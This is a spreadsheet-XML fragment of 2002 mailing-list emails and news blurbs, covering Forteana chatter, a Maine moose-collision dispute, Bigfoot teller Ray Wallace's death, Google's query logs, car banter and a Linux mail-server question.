    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-4,8723996,215/
Date: 2002-10-10T03:26:55+01:00*Media:* *Peter Preston* on the question that split the Guardian into two - 
broadsheet and tabloid.
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-4,8723997,215/
Date: 2002-10-10T03:26:54+01:00*Arts:* Curators despair at 'shortfall' in chancellor's funding.
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-3,8714364,1440/
Date: Not suppliedThe UK Environment Agency plans to allow a trebling of emissions of a 
radioactive gas produced in reactors - a decision dubbed "spineless" by critics
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-3,8699227,215/
Date: 2002-10-09T12:01:59+01:00*Live online:* One of Britain's leading poets will be here tomorrow at 2.15pm 
to celebrate National Poetry day. Post your questions now.
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-3,8714365,1440/
Date: Not suppliedMen trying for a baby subconsciously influence their hormone levels - and thus 
sperm production - to make conception more likely
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-4,8723998,215/
Date: 2002-10-10T03:26:53+01:00*Business:* Powergen yesterday shut down a quarter of its generating capacity.
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-3,8714366,1440/
Date: Not suppliedA method that could allow scientists to probe our ancestors' evolution over the 
last 20,000 years passes its first test
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-4,8723999,215/
Date: 2002-10-10T03:26:52+01:00*Society:* Blair brokers Whitehall deal on trusts borrowing private cash.
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-3,8710804,1440/
Date: Not suppliedThe new software was switched for dummy code containing a "Trojan horse" on its 
download servers
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-4,8724000,215/
Date: 2002-10-10T03:26:51+01:00*Money:* Government admits millions may have to work on beyond 65.
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-3,8708820,1440/
Date: Not suppliedMilitary communications could be jammed or intercepted and satellites thrown 
off course or destroyed, a new US study warns
</t>
  </si>
  <si>
    <t xml:space="preserve">http://www.pressherald.com/news/state/021201moose.shtmlMaine Sunday Telegram
Portland, Maine
Sunday, December 1, 2002Driver who hit moose fights county over meatBy GISELLE GOODMAN, Portland Press Herald Writer
------------------------------------------------------------------------
via http://www.lorencoleman.com
------------------------------------------------------------------------
ACTON Â‹ In her freezer at home, Lisa Pierce has ground beef and roasts,
frozen vegetables and french fries, even a couple of Popsicles. What she
doesn't have is the meat of the moose she hit and killed with her car on
Nov. 5, the moose that was rightfully hers, but instead went to a neighbor.The lack of it has her embroiled in a fight with the York County Sheriff's
Department to get back what she says she is owed."I think the deputy thought he was doing me a favor," said Pierce. "I'm a
woman and he just neglected to think that I would want it. The moose is
gone, I know that now. I want to be compensated for the meat."Whether or not that happens is uncertain. Her experience, though, highlights
a law some Mainers may not be aware of, but should get to know during this
peak time of deer-versus-car accidents, as the animals, in their mating
season, come out of the woods.The law is simple: A big-game carcass caught by a car - be it a moose, deer
or bear - goes to the person who hits it, as long as a law enforcement
officer is called to the scene and the vehicle is damaged in the accident.It comes up quite often in Maine, say officials. Last year, there were 4,055
cases of vehicles and deer colliding on Maine roads and 600 accidents
involving moose, according to Mark Latti, spokesman for the Maine Warden
Service."In a state of what, 1.4 million, with only 215,000 licensed hunters, I
don't know how many motor vehicle drivers would know how to dress out a
moose," said Latti. "You do have the option of keeping it."Which, for some people, can be valuable compensation for a damaged car.
Farm-grown deer meat can retail for $8 to $20 per pound in stores. And a
butchered or dressed moose, which can't be bought or sold anywhere in Maine,
can produce hundreds of pounds of food.Latti said when it comes to moose, the law has been abused since its
inception in 1991. Every now and then an officer will issue a summons to a
driver for intentionally killing a moose with a car. That kind of "hunting"
makes no sense to Latti.Hitting a moose, even at a slow speed, is no laughing matter. Large adult
moose can weigh up to 1,500 pounds and can be more than 9 feet tall. Since
the bulk of their weight is above the hood level of most cars, their bodies
often come crashing through windshields in collisions. More often than not,
crashes like these damage the vehicle, the people inside and the animal.Sometimes they are fatal. In 1998, Latti said, there were six moose-related
fatalities. After that, when the number of moose-hunting permits went from
2,000 to 3,000, there were less. Maine had three moose-related fatalities in
2000, one in 2001 and two this year so far, said Stephen McCausland,
spokesman for the Maine Public Safety Department.Pierce considers herself lucky that she and the three children in her car
did not become part of that statistic early on Election Day. But she also
feels cheated by the whole situation. After all, her car was totaled.On the morning of the accident, Pierce was taking her two children and a
neighbor's son to school in her 1991 Dodge Dynasty. She said she was going
along at about 35 mph on a well-traveled road, when a moose came out of
nowhere."By the time my brain could see moose, he was part of my windshield," she
said. Pierce is well aware of the law, so as she sat in the ambulance with the
children, being treated for cuts and bruises, she thought about the moose.
But the four of them were transferred to the hospital before she could deal
with it, so she said she wasn't able to follow up on the animal until later
that day.When she inquired, she was told the deputy on the scene gave the
fully-racked bull moose to a neighbor who showed up with a tractor.Her neighbor, she said, subsequently offered her the moose for the $100 it
took him to carry it away, money she didn't think she should spend. By the
time she contacted the Attorney General's Office on Nov. 12 to complain
about the deputy giving her moose away, the neighbor's price had gone up
another $300 for the cost of butchering 450 pounds of meat.And when she called York County Chief Deputy Maurice Ouellette to complain
that she should be compensated for the moose because it was the officer's
fault that she didn't have it, Ouellette told her he could not give her cash
and the best he could do was to give her the next moose struck in York
County."At that point in time it became an issue of not wanting moose anymore, but
wanting money," Ouellette said.That conversation, and a similar one she had with York County Sheriff Phil
Cote, left Pierce enraged and she now feels the issue has gone beyond the
moose.But the circumstances that brought her to this point are not surprising to
other officials."It's the officer's discretion," said Latti. "And if the officer feels the
person can't immediately remove (the animal), he's got to think of public
safety and other people on the roadway. If someone is worried about her
children in her car, the last thing a law enforcement officer wants to ask
is if she wants the moose."Maine State Police Trooper Jeremy Forbes said when he arrives at accidents
that involve a serious injury to a person, the issue of who gets the animal,
deer or moose, becomes secondary."The priorities are the injuries and getting people to the hospital," he
said. "If they are really hurt and going to the hospital, the animal can't
wait, so we'll probably give it to the next person who stops by."This is not comforting to Pierce. She said the deputy could have come to the
ambulance and asked her what she wanted to do with the moose. With her
boyfriend, a hunter, nearby, she could have easily taken care of the animal
herself.She knows her situation is probably a lost cause. But she hopes other
people, especially other women, do not have the same experience."What about people who don't know the law?" she said. "Standing up for my
rights has just been a big headache."Staff Writer Giselle Goodman can be contacted at 324-4888 or at:ggoodman@pressherald.com
To unsubscribe from this group, send an email to:
forteana-unsubscribe@egroups.com Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ </t>
  </si>
  <si>
    <t xml:space="preserve">Just to put the germano-Indian fascination in context, one should note that
there is a sizable group of German Klingons as well. Well, _I_ see a
connection, anyway.BillWilliam Jacobs
Sporadically Underemployed Person
I wish to God these calculations had been executed by steam! - Charles
Babbage
To unsubscribe from this group, send an email to:
forteana-unsubscribe@egroups.com Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ </t>
  </si>
  <si>
    <t xml:space="preserve">Ray Wallace passed away on November 26, 2002, at Toledo, Washington.
Details to follow.
To unsubscribe from this group, send an email to:
forteana-unsubscribe@egroups.com Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ </t>
  </si>
  <si>
    <t xml:space="preserve">--- In forteana@y..., Rachel Carthy  wrote:
&gt; Apparently it has giant walking land squid in it! Unmissable!Yay! Prairie Squid!Robor Admiral Ackbar?
To unsubscribe from this group, send an email to:
forteana-unsubscribe@egroups.com Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ </t>
  </si>
  <si>
    <t xml:space="preserve">--- In forteana@y..., "D.McMann"  wrote:
&gt; Jeffrey Archer: The Truth Hehe...brilliant!I especially liked the little touches like the flying pigs when Maggie
tells him she wants him to be her successor.I can imagine him watching this in his cell and thinking that it is
all perfectly true as he recalls it!RobHave you seen the missing "Have you seen" sign?
To unsubscribe from this group, send an email to:
forteana-unsubscribe@egroups.com Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ </t>
  </si>
  <si>
    <t xml:space="preserve">The material appended below comes from Martin Gardner's
book _Fads and Fallacies in the Name of Science_ -- revised
and expanded edition published in 1957 by Dover Publications,
Inc. (New York City).Bill Bennetta
_________________________________________________"[M]ost pseudo-scientists have a number of characteristics in
common.        "First and most important of these traits is that cranks work
in almost total isolation . . . in the sense of having no fruitful
contacts with fellow researchers. . . . The modern crank insists
that his isolation is not desired on his part.  It is due, he claims,
to the prejudice of established scientific groups against new
ideas. . . .        "The modern pseudo-scientist . . .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crank's
existence unless his work is given widespread publicity through
non-academic channels, or unless the scientist makes a hobby
of collecting crank literature.  The eccentric is forced, therefore,
to tread a lonely way.  He speaks before organizations he
himself has founded, contributes to journals he himself may
edit, and -- until recently -- publishes books only when he
or his followers can raise sufficient funds to have them printed
privately.        "A second characteristic of the pseudo scientist, which
greatly strengthens his isolation, is a tendency toward
paranoia. . . .        "There are five ways in which the sincere pseudo-
scientist's paranoid tendencies are likely to be exhibited.        "(1) He considers himself a genius.        "(2)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 . .        "(3) He believes himself unjustly persecuted and discriminated
against. . . .        "(4)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 . .        "(5) He often has a tendency to write in a complex
jargon, in many cases making use of terms and phrases he
himself has coined. . . ."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welcome.]To unsubscribe from this group, send an email to:
forteana-unsubscribe@egroups.com Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ </t>
  </si>
  <si>
    <t xml:space="preserve">I found this interesting, but not very original. Another search engine 
(can't remember which one tho') was doing this a long time ago.http://www.bangkokpost.com/Business/02Dec2002_biz54.html=====
Postcards from Planet GoogleINTERNET: The search engine is taking snapshots of its users' minds and 
aggregating them. So what is the world thinking about?JENNIFER 8. LEEAt Google's squat headquarters off Route 101, visitors sit in the lobby, 
transfixed by the words scrolling by on the wall behind the 
receptionist's desk: animacio{AAC}n japonese Harry Potter pense{AAC}es 
et poemes associao brasileira de normas te{AAC}cnicas.The projected display, called Live Query, shows updated samples of what 
people around the world are typing into Google's search engine. The 
terms scroll by in English, Chinese, Spanish, Swedish, Japanese, Korean, 
French, Dutch, Italian _ any of the 86 languages that Google tracks.The scrolling continues: people who shouldn't marry ``she smoked a 
cigar'' mr potatoheads in long island pickup lines to get women auto 
theft fraud how to.Stare at Live Query long enough, and you feel you are watching the 
collective consciousness of the world stream by.Each line represents a thought from someone, somewhere with an Internet 
connection. Google collects these queries _ 150 million a day from more 
than 100 countries _ in its databases, updating and storing the computer 
logs millisecond by millisecond.Google is taking snapshots of its users' minds and aggregating them.So what is the world thinking about?Sex, for one thing.``You can learn to say `sex' in a lot of different languages by looking 
at the logs,'' said Craig Silverstein, director of technology at Google. 
(To keep Live Query G-rated, Google filters out sex-related searches, 
though less successfully with foreign languages.)Despite its geographic and ethnic diversity, the world is spending much 
of its time thinking about the same things. The same topic areas bubble 
to the top: celebrities, current events, products and computer downloads.``It's amazing how similar people are all over the world based on what 
they are searching for,'' said Greg Rae, one of three members of 
Google's logs team, which is responsible for building, storing and 
protecting the data record.Google's following _ it is the most widely used search engine _ has 
given Mr Rae a worldview from his cubicle. Since October 2001,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far-flung in origin: Nokia, Sony, BMW, Ferrari, Ikea and Microsoft.Judging from Google's data, some sports events stir interest almost 
everywhere: the Tour de France, Wimbledon, the Melbourne Cup horse race 
and the World Series were among the top 10 sports-related searches last 
year. It also becomes obvious just how familiar American movies, music 
and celebrities are to searchers across the globe. Two years ago, a 
Google engineer named Lucas Pereira noticed that searches for Britney 
Spears had declined, indicating what he thought must be a decline in her 
popularity. From that observation grew Google Zeitgeist, a listing of 
the top gaining and declining queries of each week and month.Glancing over Google Zeitgeist is like taking a trivia test in cultural 
literacy: Ulrika Jonsson, the Swedish-born British television host and 
girlfriend of England football coach Sven Goran Eriksson, made the list 
recently. So did Irish Travellers (a nomadic ethnic group, one of whose 
members was videotaped beating her young daughter in Indiana) and 
fentanyl (the narcotic gas used in the Moscow raid to rescue hostages 
taken by Chechen rebels in late October).The long-lasting volume of searches involving her name has made Britney 
Spears something of a benchmark for the logs team. It has helped them 
understand how news can cause spikes in searches, as it did when she 
broke up with Justin Timberlake.Google can feel the reverberations of such events, and others of a more 
serious nature, immediately.On Feb 28, 2001, for example, an earthquake began near Seattle at 10:54 
am local time. Within two minutes, earthquake-related searches jumped to 
250 a minute from almost none, with a concentration in the US Pacific 
Northwest. On Sept 11, searches for the World Trade Center, Pentagon and 
CNN shot up immediately after the attacks. Over the next few days, 
Nostradamus became the top search query, fuelled by a rumour that 
Nostradamus had predicted the trade center's destruction.But the most trivial events may also register on Google's sensitive 
cultural seismic meter.The logs team came to work one morning to find that ``carol brady maiden 
name'' had surged to the top of the charts.Curious, they mapped the searches by time of day and found that they 
were neatly grouped in five spikes, each one starting at 48 minutes 
after the hour.As the logs were passed through the office, employees were perplexed. 
Why would there be a surge in interest in a character from the 1970s 
sitcom The Brady Bunch? But the data could only reflect patterns, not 
explain them.That is a paradox of a Google log: it does not capture social phenomena 
per se, but merely the shadows they cast across the Internet.``The most interesting part is why,'' said Amit Patel, who has been a 
member of the logs team. ``You can't interpret it unless you know what 
else is going on in the world.''So what had gone on on April 22, 2001?That night the million-dollar question on the game show Who Wants to Be 
a Millionaire? had been, ``What was Carol Brady's maiden name?'' Seconds 
after the show's host posed the question, thousands flocked to Google to 
search for the answer (Tyler), producing four spikes as the show was 
broadcast successively in each US time zone.The precision of the Carol Brady data was eye-opening for some.``It was like trying an electron microscope for the first time,'' said 
Sergey Brin, who as a graduate student in computer science at Stanford 
helped found Google in 1998 and is now its president for technology. 
``It was like a moment-by-moment barometer.''Predictably, Google's query data respond to television, movies and 
radio. But the mass media also feed off the demands of their audiences. 
One of Google's strengths is its predictive power, flagging trends 
before they hit the radar of other media.As such it could be of tremendous value to entertainment companies or 
retailers. Google is quiet about what if any plans it has for 
commercialising its vast store of query information. ``There is 
tremendous opportunity with this data,'' Mr Silverstein said. ``The 
challenge is defining what we want to do.''Google currently does not allow outsiders to gain access to raw data 
because of privacy concerns. Searches are logged by time of day, 
originating IP address (information that can be used to link searches to 
a specific computer), and the sites on which the user clicked. People 
tell things to search engines that they would never talk about publicly 
_ Viagra, pregnancy scares, fraud, facelifts. What is interesting in the 
aggregate can be seem an invasion of privacy if narrowed to an individual.In aggregate form, Google's data can make a stunning presentation. Next 
to Mr Rae's cubicle is the GeoDisplay, a 40-inch screen that gives a 
three-dimensional geographical representation of where Google is being 
used around the globe. The searches are represented by coloured dots 
shooting into the atmosphere. The colours _ red, yellow, orange _ convey 
the impression of a globe whose major cities are on fire. The tallest 
flames are in New York, Tokyo and the San Francisco Bay area.Each country has a distinctive usage pattern. Spain, France and Italy 
have a midday lull in Google searches, presumably reflecting leisurely 
lunches and relaxation. In Japan, the peak usage is after midnight, when 
phone rates for dial-up modems drop.Google's worldwide scope means that the company can track ideas and 
phenomena as they hop from country to country.Take Las Ketchup, a trio of singing sisters who became a sensation in 
Spain last spring with a gibberish song and accompanying knee-knocking 
dance similar to the Macarena.Like a series of waves, Google searches for Las Ketchup undulated 
through Europe over the summer and fall.The Ketchup Song (Hey Hah) has already topped the charts in 18 
countries. In late summer, Google's logs show, Las Ketchup searches 
began a strong upward climb in the United States, Britain and the 
Netherlands.Haven't heard of Las Ketchup?If you haven't, Google predicts you soon will.
===rgrds,
Bernard
_______________________________________________
IIU mailing list
IIU@iiu.taint.org
http://iiu.taint.org/mailman/listinfo/iiu
</t>
  </si>
  <si>
    <t xml:space="preserve">hi i was just wondering if anyone experiening difficulty with eircom mail
sever.I was trying to send mail from mozilla mail but it keeps coming up
with this error:
sorry,that domain isnt in my list of allows rcpthosts(#5.7.1)
please check the message recipients and try again.What is this all about.
I am using mail2.eircom.net as my smtp and my pop, i can recieve mail but
i cannot send mail. is there any other open relay that i  can use.
nils
Also i was just browsing the web and came across this
http://www.microsoft.com/ireland/security/info2.htm
Its a seminar on
security and reliable
maybe ilug should go along and hold a seminar on the same day right
across the hall from this!
nils
-- 
Irish Linux Users' Group: ilug@linux.ie
http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">--- In forteana@y..., That Goddess Chick  wrote:
&gt; &gt;It's official, I'm a failure. The only moderately famous schoolmates I have are both (now) freelance
tech journos. One, Gordon Laing, used to be editor of Personal
Computer World (personal page http://www.glnow.com) and the other
(Laurence Grayson) seems to pop up frequently in ZDNet publications 
(http://news.zdnet.co.uk/story/0,,t269-s2070948,00.html reveals the
accurate statement "nobody does mournfully better than Laurence"). I
have the satisfaction of knowing that the former is now raving bald
and that I once stole the latter's girlfriend.Oh, yes, nearly forgot Ramon Tikaram (Tanita's brother) who's gone
from "Cutthroat Island" to the series "This Life" and has now reached
the dizzying heights of "Crossroads". He isn't a half bad musician,
actually. He was a year or two above me at uni, so I'm not sure that
he counts.My uncle was at Oxfnord with Alan Bennett and a few others whose names
I forget.My wife tells me that someone she was at school with became one of the
Teletubbies (well, they were from St Just, what can you expect) and
another (who Rev Joe might know) is now a movie special-effects wizard
called Bellamy (possibly "Pete", definitely not "David").Roband then there was the time i nearly knocked Harold Wilson under a
train....
To unsubscribe from this group, send an email to:
forteana-unsubscribe@egroups.com Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ </t>
  </si>
  <si>
    <t xml:space="preserve">Yes, I enjoyed it.
Then afterwards, there was a debate thing on ITV about genius or madness,
featuring a friend of mine's boss plus David Icke, also the very likeable
Evelyn Glennie.DaveTo unsubscribe from this group, send an email to:
forteana-unsubscribe@egroups.com Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ </t>
  </si>
  <si>
    <t xml:space="preserve">Jets Attempt to Intercept 'Contrail' By ROBERT BURNS
AP Military Writer WASHINGTON (AP)--The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11 attacks, the
Pentagon has taken greater precautions to monitor U.S.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4 p.m.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``I'm
aware of the reports.'' He referred all questions to NORAD. Jenkins said he was not sure who reported the initial sighting over the
Caribbean. He also was unsure who requested NORAD to launch fighter jets or
from which military bases they were scrambled. ``We don't necessarily judge or second-guess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re-entering
the Earth's atmosphere about 6:15 a.m. The U.S. Strategic Command in Omaha,
Neb., and the North American Aerospace Defense Command confirmed a Russian
rocket fell back to Earth, but gave no further details. 
AP-NY-11-28-02 1833ESTCopyright 2002, The Associated Press. The information contained in the AP
Online news report may not be published, broadcast or redistributed without
the prior written authority of The Associated Press.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welcome.]To unsubscribe from this group, send an email to:
forteana-unsubscribe@egroups.com Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ </t>
  </si>
  <si>
    <t xml:space="preserve">"Leonard R. Cleavelin" wrote:
&gt;Scat I have, unfortunately, run across. But this is the second reference I've 
&gt;seen in as many weeks to "Japanese tentacle porn", which is a genre I've 
&gt;lived in complete (and probably blissful) ignorance of until now. Unless it's 
&gt;going to gross out a significant percentage of the readership of the list, 
&gt;can we have a definition/description? Some of us lead sheltered lives.&lt; http://www.abcb.com/ency/t/tentacle.htm &gt;Now, isn't your life just SOOOO much more enriched?Dave Palmer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welcome.]To unsubscribe from this group, send an email to:
forteana-unsubscribe@egroups.com Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ </t>
  </si>
  <si>
    <t xml:space="preserve">I think I understand the feeling.  A few years ago I caught up with
a couple of old fiancï¿½s, both now authors and notable in their
field.  One is a minor celebrity -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mando-bass artists could there be?) so have that
feather in my cap if I cared about it.I feel I am only a little jealous or depressed thinking about my
own accomplishments (or lack thereof) - what does
bug me is that these 2 probably have some real good
juicy stories and I'm not getting to hear any of them!!
That's one reason I love this list...- SteveTo unsubscribe from this group, send an email to:
forteana-unsubscribe@egroups.com Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ </t>
  </si>
  <si>
    <t xml:space="preserve">Well, I know a guy that split up from her that wrote Harry Potter.
Though he is doing fine.I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forteana-unsubscribe@egroups.com Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ </t>
  </si>
  <si>
    <t xml:space="preserve">Raymond L. Wallace, 83
Bigfoot Story Teller
(1919-2002)Ray Wallace, a controversial figure involved in 44 years of Bigfoot-related
events, died November 26, 2002, in Toledo, Washington.  The Washington State
construction tycoon had been ill for some time, living in a Toledo rest
home.It was at Bluff Creek, California, in 1958, which found Ray WallaceÂ¹s
company building a new road through the northern California forest.   In
August through October, Wallace Construction Company's employee Jerry Crew
found tracks of a huge humanlike foot.  Thanks to instructions from
taxidermist Bob Titmus, Crew made the first plaster casts of a footprint
from this hairy upright creature his fellow workers called Â³Bigfoot.Â²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todayÂ¹s
global awareness of Bigfoot. Soon after the publicized Crew finds, Wallace
and his brother claimed other Bigfoot activity around the construction site;
Wallace said he found tracks and droppings of Bigfoot.Wallace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mystery.In March 1998, Ray Wallace offered a million dollars to the first person who
could bring him a live baby Bigfoot.  Saying he had tracked Bigfoot for
forty years, Wallace claimed he wanted to raise a young Sasquatch to
adulthood. Wallace told reporters he planned to raise a baby Bigfoot with
Â³care and respectÂ² and would like to train the creature to ride around with
him in his pickup truck and help out with chores around his ranch.  No one
came forth with a baby Bigfoot.Ray Wallace added an intriguing, mostly harmless story-telling element to
the otherwise often serious pursuit of Bigfoot that various friends of his,
such as Ray Crowe, Director of the International Bigfoot Society, enjoyed.Ray Wallace was interred at the Lone Hill Cemetery in Toledo, Washington
State, on November 30, 2002.Â©Loren Coleman 2002
http://www.lorencoleman.com
To unsubscribe from this group, send an email to:
forteana-unsubscribe@egroups.com Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ </t>
  </si>
  <si>
    <t>Best bang for the buck:  390 hp Mustang Cobra @ $35k.GG, recently emerged from the passenger side of a 2003 with the largest
smile.-----Original Message-----
From: fork-admin@xent.com [mailto:fork-admin@xent.com]On Behalf Of
Joseph S. Barrera III
Sent: Sunday, December 01, 2002 1:40 PM
To: fork@spamassassin.taint.org
Subject: Re: Mercedes-Benz G55
On the other end of the spectrum, I just bought a Honda del Sol
for my new commute to San Jose (from San Bruno)... I wonder if
it would fit in the cargo area of a G55.- Joe</t>
  </si>
  <si>
    <t xml:space="preserve">use Perl Daily NewsletterIn this issue:
    * The 2002 Perl Advent Calendar+--------------------------------------------------------------------+
| The 2002 Perl Advent Calendar                                      |
|   posted by pudge on Sunday December 01, @16:15 (modules)          |
|   http://use.perl.org/article.pl?sid=02/12/01/2057219              |
+--------------------------------------------------------------------+[0]2shortplanks writes "Doesn't December come round quickly? Announcing
the [1]third Perl Advent Calendar, the Advent calendar that features a
different Perl module each day of Advent, and a bonus module on Christmas
day. This year's improvements include each day having its own
mini-tutorial attached, and much better HTML."Discuss this story at:
    http://use.perl.org/comments.pl?sid=02/12/01/2057219Links:
    0. mailto:useperlreply@twoshortplanks.com
    1. http://www.perladvent.org/2002/Copyright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</si>
  <si>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&gt;
&gt;I believe I'll go drown my sorrows in vanilla Coke now.Well, you might be successful too if Arthur Miller had been your father.  Or
is this some other movie?
john k
To unsubscribe from this group, send an email to:
forteana-unsubscribe@egroups.com Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ </t>
  </si>
  <si>
    <t xml:space="preserve">Jay Lake wrote:
&gt;It's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Hollywood.#1 Those of us who are envious of your success as a writer and artist
might find this a bit hard to understand.  #2 Once, when forced to mix with a wife's associate's [French] husband
who spent most of his time blowing his horn about how he had wined and
dined and hung out with the famous and wonderful, I became
progressively more and more Jethro-like until I was using phrases like
"Heehaw y'all --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armpitTo unsubscribe from this group, send an email to:
forteana-unsubscribe@egroups.com Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ </t>
  </si>
  <si>
    <t xml:space="preserve">Nova Nova wrote:
&gt; bass and treble settings do not seem to have any affect on the sound.Look around for a "Tone" toggle.  Toggle it.
_______________________________________________
RPM-List mailing list 
http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; Well, you might be successful too if Arthur Miller had been
&gt; your father.  Or is this some other movie?Nope, that's her. Particularly exciting moments stage managing "The
Crucible" my senior year when Becky's dad came to see his little girl in
his play and our male lead fell off the stage. Ahem. The joys of attending
Choate, where even as high school bloke you can make big mistakes with
(other peoples') real money.&gt; #1 Those of us who are envious of your success as a writer and
&gt; artist might find this a bit hard to understand.Hey, Rick, that's quite nice. Not to demean my own accomplishments, but I
don't have a &amp;&amp;^*$%&amp;^% film deal, which pays more per hour than I'll make
in a lifetime of short fiction. OTOH, count my blessings -- I've had
fourteen stories in print this year, already fifteen more coming next
year, strong critical reception and my first collection due out this
coming spring.Ah. I feel much better now. Take that, Becky Miller!(But I'll bet she drives a nicer car than me.)Jay, back to work on the megafelid cranial capacity story---
"Story Words" - daily microfiction at: http://storyword.blogspot.com/
Coming soon at blogspot: "Teeth Party -- the Mad Hater and the Dorkmouse"
---
Watch for my upcoming fiction:
"Tall Spirits, Blocking the Night" -- TALEBONES #25, Dec 2002
"Jack's House" -- STRANGE HORIZONS, Dec 2002
"Of Stone Castles and Vainglorious Time" -- REDSINE, Jan 2003
"One Is All Alone" -- STRANGE HORIZONS, Jan 2003
"You Want Candy" -- AS OF YET UNTITLED, Feb 2003
"Walking Backward Through the Countries of Life" -- HOUR OF PAIN, Feb 2003
---
Jay Lake | www.jlake.com | jlake@jlake.com | 503.806.3626
To unsubscribe from this group, send an email to:
forteana-unsubscribe@egroups.com Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ </t>
  </si>
  <si>
    <t xml:space="preserve">On Sun, 2002-12-01 at 21:01, Geege Schuman wrote:
&gt; Best bang for the buck:  390 hp Mustang Cobra @ $35k.
&gt; 
&gt; GG, recently emerged from the passenger side of a 2003 with the largest
&gt; smile.If only they weren't the ugliest things Ford has ever produced, in a
long and distinguished history of ugly.Luis [former owner of a recent-model mustang and hence allowed to talk]P.S. You can get an RSX Type S with 200hp for $23K. I have not yet
driven an RSX, but if it's anything like a late model Integra, it will
kick the ass of the Mustang in anything that requires you to actually
move the steering wheel from the center position.&gt; -----Original Message-----
&gt; From: fork-admin@xent.com [mailto:fork-admin@xent.com]On Behalf Of
&gt; Joseph S. Barrera III
&gt; Sent: Sunday, December 01, 2002 1:40 PM
&gt; To: fork@spamassassin.taint.org
&gt; Subject: Re: Mercedes-Benz G55
&gt; 
&gt; 
&gt; On the other end of the spectrum, I just bought a Honda del Sol
&gt; for my new commute to San Jose (from San Bruno)... I wonder if
&gt; it would fit in the cargo area of a G55.
&gt; 
&gt; - Joe
&gt; 
&gt; 
&gt; 
&gt; 
&gt; 
&gt; 
</t>
  </si>
  <si>
    <t xml:space="preserve">Terry W. Colvin fwded:
&gt;"Leonard R. Cleavelin" wrote:
&gt;&gt;Scat I have, unfortunately, run across. But this is the second reference I've
&gt;&gt;seen in as many weeks to "Japanese tentacle porn", which is a genre I've
&gt;&gt;lived in complete (and probably blissful) ignorance of until now. Unless it's
&gt;&gt;going to gross out a significant percentage of the readership of the list,
&gt;&gt;can we have a definition/description? Some of us lead sheltered lives.
&gt;
&gt;&lt; http://www.abcb.com/ency/t/tentacle.htm &gt;
&gt;
&gt;Now, isn't your life just SOOOO much more enriched?
&gt;
&gt;Dave PalmerNot a new Japanese genre either - check out Hokusai's "Dream of the 
Fisherman's Wife" (at  
and you don't want to know how many waves and views of Mt Fuji I had 
to wade through to find that for you discerning connoisseurs).Rachel
-- "The banana is also the safest pistol from the assassin's point of view.
Bystanders are unlikely to intervene when one person chases another down
the street brandishing a banana. Indeed, they may not believe that they
saw it."              _Killer, the Game of Assassination_, Steve JacksonTo unsubscribe from this group, send an email to:
forteana-unsubscribe@egroups.com Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ </t>
  </si>
  <si>
    <t xml:space="preserve">One of the main strands of this 'modernisation' is to have all stations on a 'retained' basis at night. Basically this means that the fire station will be unmanned and in the event of a fire, the fire-fighters will be summonsed by pagers, the same way that they currently are in a lot of rural regions. The main reason for this is that fewer fires occur at night. However, the majority of fatalities in fires do occur at night and the recent deaths during the fire-fighters' strike all occurred at night. Over half of these happened in areas currently covered by retained crews who aren't on strike and would appear to give a grim foreshadowing of what may be to come. Currently one of the conditions for being in a retained crew is that you must live/work within one mile of the station. How they will apply this to whole time fire-fighters is still unclear. A good friend of mine is a station officer in Hampshire and currently lives 20 miles from his station so how he'll respond to fire calls at night is a mystery.  And I can't see many fire-fighters living within a mile of some of the inner London stations.DaveTo unsubscribe from this group, send an email to:
forteana-unsubscribe@egroups.com Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ </t>
  </si>
  <si>
    <t xml:space="preserve">
Forwarded-by: William Knowles http://mdn.mainichi.co.jp/news/20021201p2a00m0fp001000c.htmlMainichi Shimbun
Dec. 1, 2002KASHIWA, Chiba -- A man has been arrested for using his camera-equipped
mobile phone to take a photo of the inside of a schoolgirl's skirt
as she rode an escalator here, police said.Toyokazu Hamano, 40, a company employee from Noda, Chiba Prefecture,
was arrested for breaking a Chiba Prefectural Government law
forbidding people from creating a public nuisance.Hamano admits to the allegations.Police said Hamano was riding behind the girl on an escalator at
JR Kashiwa Station when he took out his mobile phone, held it
underneath the girl's skirt and took a photo. The girl was alerted
to his presence by the noise emitted by the phone camera's shutter.
She turned around to catch Hamano with his hands between her legs.
</t>
  </si>
  <si>
